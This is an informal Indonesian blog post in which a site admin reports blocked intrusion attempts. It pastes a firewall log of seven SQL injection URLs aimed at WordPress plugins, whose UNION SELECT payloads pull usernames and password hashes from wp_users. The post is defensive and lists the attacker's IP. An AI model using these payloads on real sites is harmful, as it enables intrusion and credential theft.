Hello World,
I See The Intrusion @ serverISdown
Lagi dan lagi.. Percobaan untuk masuk ke serverISdown terdeteksi dan sudah di tangani dengan baik dari awal oleh saudara Xshadow sungguh perkiraan yang sangat baik dari beliau. Saya masih ingat bagaimana beliau menyarankan agar memakai double key dan pake dinding yang punya api. hehehe… cheers sob!
Kali ini serangan bukan hanya dari malingSIAL, rame dah.. serangan kali ini dengan SQLi, menggunakan xploit oleh S@BUN, ntah dia sendiri ato fans2 nya yang ga jelas melakukan exploitasi ini, soalnya ngga nge-cek sampe kesana.
Sampai sekarang kita masih aman-aman saja, belum tau kalo gimana nantinya.. hehehe.. kita akan selalu berusaha untuk tidak “down” ho ho ho… tapi emang udah “down” sejak dari awal berdirinya.
Ini sedikit jejak yang di tinggalkan oleh “attacker” dimana dia sangat semangat sekali untuk mencoba masuk ke serverISdown, mencoba banyak cara.
Check this out :
Web Page: www.news.serverisdown.org/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0×3a,user_pass)/**/from/**/wp_users/*
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: dl_id = null/**/union/**/all/**/select/**/concat(user_login,0×3a,user_pass)/**/from/**/wp_users/*
Web Page: www.news.serverisdown.org/index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: photo = -333333/**/union/**/select/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from/**/wp_users/**WHERE admin 1= 1
Web Page: www.news.serverisdown.org/forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: topic = -99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*
Web Page: www.news.serverisdown.org/sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: forum = -99999/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users/*
Web Page: www.news.serverisdown.org/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: newsletter = -1/**/UNION/**/SELECT/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/FROM/**/wp_users
Web Page: www.news.serverisdown.org/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0×7c,user_login,0×7c,user_pass,0×7c),concat(0×7c,user_login,0×7c,user_pass,0×7c),4,5/**/FROM/**/wp_users
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: id = -998877/**/UNION/**/SELECT/**/0,1,concat(0×7c,user_login,0×7c,user_pass,0×7c),concat(0×7c,user_login,0×7c,user_pass,0×7c),4,5/**/FROM/**/wp_users
Web Page: news.serverisdown.org/?exact=1&sentence=1&s=%b3%27//AND//ID=-1//UNION/SELECT/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//wp_users%23
Warning: URL may contain dangerous content!
Offending IP: 41.232.102.179
Offending Parameter: s = ³’//AND//ID=-1//UNION/SELECT/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//wp_users#
Buat teman2 yang terkasih, jangan di coba buka link itu yah, nanti bisa barabe.. soalnya saya ngga bertanggung jawab apa yang akan terjadi.
Salam Hangat,
